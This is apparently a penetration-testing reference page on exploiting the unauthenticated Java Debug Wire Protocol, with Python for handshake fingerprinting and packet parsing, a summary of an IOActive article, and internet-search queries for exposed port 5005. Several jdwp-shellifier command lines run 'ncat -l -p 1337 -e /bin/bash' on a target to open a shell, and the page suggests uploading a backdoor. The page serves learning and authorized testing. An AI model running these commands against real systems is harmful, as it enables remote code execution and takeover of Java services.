5005 - Jdwp

💡 Study note: This document describes penetration-testing methods for JDWP (Java Debug Wire Protocol), intended as a reference for information-security beginners and practitioners.

⚠️ Legal notice: This document is for learning and authorized testing only. Testing systems without authorization may violate laws and regulations.


Pentesting JDWP - Java Debug Wire Protocol

Exploiting

JDWP exploitation hinges on the protocol's lack of authentication and encryption: whoever can reach the socket gets full debugger control over the JVM. It is generally found on port 8000 or 5005 (the port this page is indexed under), but any port configured in the agent's address= option is possible. The initial connection is made by sending the 14-byte ASCII string "JDWP-Handshake" to the target port. If a JDWP agent is listening, it replies with exactly the same string, confirming its presence; any other banner, an immediate close, or a timeout means the service is not JDWP. This handshake therefore acts as a cheap and reliable fingerprinting method for identifying JDWP services on a network.

For process identification on a host, search the command lines of running Java processes for the string "jdwp": a debug-enabled JVM is started with an option such as -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 (or the older -Xrunjdwp:... form), and the address= value tells you which interface and port the agent listens on.
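A minimal fingerprinter for the handshake described above. This is an added example, not code from the page or from jdwp-shellifier; the names jdwp_fingerprint, _fake_listener and fingerprint_demo are ours, and the two listeners started in fingerprint_demo are constructed stand-ins (one echoes the handshake like a JDWP agent, the other answers like an HTTP server) so that the example runs offline.

```python
import socket
import threading
from typing import Tuple

HANDSHAKE = b"JDWP-Handshake"  # the 14 ASCII bytes the debugger sends first


def jdwp_fingerprint(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True if host:port answers the JDWP handshake with the same 14 bytes.

    A JDWP agent started with server=y echoes the string back verbatim and then
    waits for command packets. Any other banner, an immediate close, or a
    timeout is reported as 'not JDWP' instead of raising.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(HANDSHAKE)
            reply = b""
            while len(reply) < len(HANDSHAKE):
                chunk = s.recv(len(HANDSHAKE) - len(reply))
                if not chunk:          # peer closed before sending 14 bytes
                    return False
                reply += chunk
            return reply == HANDSHAKE
    except OSError:                    # refused, unreachable, timed out
        return False


def _fake_listener(reply: bytes) -> int:
    """Constructed one-shot TCP listener on 127.0.0.1 standing in for a target.

    It reads the client's handshake and answers with `reply`; returns the port.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve() -> None:
        conn, _ = srv.accept()
        with srv, conn:
            conn.settimeout(3.0)
            try:
                conn.recv(len(HANDSHAKE))   # consume the client's handshake
                conn.sendall(reply)
            except OSError:
                pass

    threading.Thread(target=serve, daemon=True).start()
    return port


def fingerprint_demo() -> Tuple[bool, bool]:
    """Probe a JDWP-like listener and a non-JDWP listener.

    Returns (result for the echoing port, result for the HTTP-like port),
    which should be (True, False).
    """
    jdwp_port = _fake_listener(HANDSHAKE)                        # behaves like a JDWP agent
    http_port = _fake_listener(b"HTTP/1.1 400 Bad Request\r\n")  # some other service
    return (jdwp_fingerprint("127.0.0.1", jdwp_port),
            jdwp_fingerprint("127.0.0.1", http_port))


if __name__ == "__main__":
    print(fingerprint_demo())
```

To sweep a range, call jdwp_fingerprint for each candidate host and port from a port scan. Note that an agent started with server=n connects outwards to the debugger and never listens, so it will not show up this way.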

The go-to tool is jdwp-shellifier. You can use it with different parameters:

./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept

Using --break-on 'java.lang.String.indexOf' makes the exploit more stable: the default breakpoint, java.net.ServerSocket.accept, only fires when the application accepts a new connection, whereas String.indexOf is called constantly, so the breakpoint (and the command that runs from it) triggers almost immediately. If you have the chance to upload a backdoor to the host and execute it instead of running a long command line, the exploit becomes more stable still.

More details

This is a summary of https://ioactive.com/hacking-java-debug-wire-protocol-or-how/. Check it for further details.

  1. JDWP Overview:

    • It’s a packet-based network binary protocol, primarily synchronous.
    • Lacks authentication and encryption, making it vulnerable when exposed to hostile networks.
  2. JDWP Handshake:

    • A simple handshake process is used to initiate communication. A 14-character ASCII string “JDWP-Handshake” is exchanged between the Debugger (client) and the Debuggee (server).
  3. JDWP Communication:

    • Every packet starts with an 11-byte header: Length (4 bytes, including the header), Id (4 bytes, used to match replies to commands), Flags (1 byte; 0x80 marks a reply), then CommandSet (1 byte) and Command (1 byte) for command packets, or a 2-byte ErrorCode for replies. All integers are big-endian.
    • The CommandSet value tells you which side a packet is addressed to: 0x00-0x3F are commands sent to the target VM, 0x40-0x7F are commands sent to the debugger (events), and 0x80-0xFF are vendor-defined.
  4. Exploitation:

    • JDWP allows loading and invoking arbitrary classes and bytecode, posing security risks.
    • The article details an exploitation process in five steps, involving fetching Java Runtime references, setting breakpoints, and invoking methods.
  5. Real-Life Exploitation:

    • Despite potential firewall protections, JDWP services are discoverable and exploitable in real-world scenarios, as demonstrated by searches on platforms like ShodanHQ and GitHub.
    • The exploit script was tested against various JDK versions and is platform-independent, offering reliable remote code execution (RCE).
  6. Security Implications:

    • The presence of open JDWP services on the internet underscores the need for regular security reviews, disabling debug functionalities in production, and proper firewall configurations.
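The packet layout from points 2 and 3 above, as an added example (not code from the page or from the IOActive article): it frames a VirtualMachine.Version command, parses command and reply headers, decodes the JDWP string type, and classifies a CommandSet by the ranges given above. The function names are ours; the reply body built inside framing_demo is constructed to follow the Version reply layout from the JDWP spec, and the version strings in it are made up.

```python
import struct

HEADER_LEN = 11        # every JDWP packet begins with an 11-byte header
FLAG_REPLY = 0x80      # Flags bit set on reply packets, clear on commands

# CommandSet 1 = VirtualMachine, Command 1 = Version (values from the JDWP spec)
CMDSET_VIRTUALMACHINE = 1
CMD_VERSION = 1


def build_command(pkt_id: int, cmdset: int, cmd: int, data: bytes = b"") -> bytes:
    """Command packet: Length(4) Id(4) Flags(1)=0x00 CommandSet(1) Command(1) data."""
    return struct.pack(">IIBBB", HEADER_LEN + len(data), pkt_id, 0x00, cmdset, cmd) + data


def build_reply(pkt_id: int, error: int, data: bytes = b"") -> bytes:
    """Reply packet: Length(4) Id(4) Flags(1)=0x80 ErrorCode(2) data."""
    return struct.pack(">IIBH", HEADER_LEN + len(data), pkt_id, FLAG_REPLY, error) + data


def parse_packet(buf: bytes) -> dict:
    """Parse the packet at the start of buf; raises ValueError if it is truncated."""
    if len(buf) < HEADER_LEN:
        raise ValueError("short header")
    length, pkt_id, flags = struct.unpack(">IIB", buf[:9])
    if length < HEADER_LEN or len(buf) < length:
        raise ValueError("truncated packet")
    pkt = {"id": pkt_id, "flags": flags, "data": buf[HEADER_LEN:length]}
    if flags & FLAG_REPLY:
        (pkt["error"],) = struct.unpack(">H", buf[9:11])
    else:
        pkt["cmdset"], pkt["cmd"] = struct.unpack(">BB", buf[9:11])
    return pkt


def cmdset_origin(cmdset: int) -> str:
    """Which side a CommandSet value is addressed to, per the spec's ranges."""
    if cmdset < 0x40:
        return "target VM"        # debugger -> debuggee commands (VirtualMachine, ...)
    if cmdset < 0x80:
        return "debugger"         # debuggee -> debugger (Event composite, set 64)
    return "vendor-defined"


def encode_string(s: str) -> bytes:
    """JDWP 'string': 4-byte big-endian length followed by UTF-8 bytes."""
    raw = s.encode("utf-8")
    return struct.pack(">I", len(raw)) + raw


def decode_string(data: bytes, off: int = 0):
    """Decode a JDWP string at offset off; returns (text, new_offset)."""
    (n,) = struct.unpack(">I", data[off:off + 4])
    return data[off + 4:off + 4 + n].decode("utf-8"), off + 4 + n


def framing_demo() -> dict:
    """Round-trip a VirtualMachine.Version exchange through the framing code."""
    request = build_command(1, CMDSET_VIRTUALMACHINE, CMD_VERSION)
    req = parse_packet(request)

    # Constructed reply body in the Version reply layout:
    # description(string) jdwpMajor(int) jdwpMinor(int) vmVersion(string) vmName(string)
    body = (encode_string("Java Debug Wire Protocol (Reference Implementation) version 11.0")
            + struct.pack(">ii", 11, 0)
            + encode_string("11.0.2")
            + encode_string("OpenJDK 64-Bit Server VM"))
    rep = parse_packet(build_reply(req["id"], 0, body))

    description, off = decode_string(rep["data"])
    major, minor = struct.unpack(">ii", rep["data"][off:off + 8])
    off += 8
    vm_version, off = decode_string(rep["data"], off)
    vm_name, _ = decode_string(rep["data"], off)
    return {
        "request_len": len(request),            # 11: header only, no body
        "request_target": cmdset_origin(req["cmdset"]),
        "reply_error": rep["error"],
        "jdwp_major": major, "jdwp_minor": minor,
        "vm_version": vm_version, "vm_name": vm_name,
        "description": description,
    }


if __name__ == "__main__":
    for k, v in framing_demo().items():
        print(f"{k}: {v}")
```

Sending the 11-byte Version command right after a successful handshake is the first thing a tool like jdwp-shellifier does; the reply identifies the exact JDK and VM, with no authentication involved at any step.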

Search Engine Syntax

FOFA

# FOFA search syntax
port="5005"

Shodan

# Shodan search syntax
port:5005

ZoomEye

# ZoomEye search syntax
port:5005

A port match only tells you that something listens on 5005; confirm each hit with the handshake before treating it as JDWP.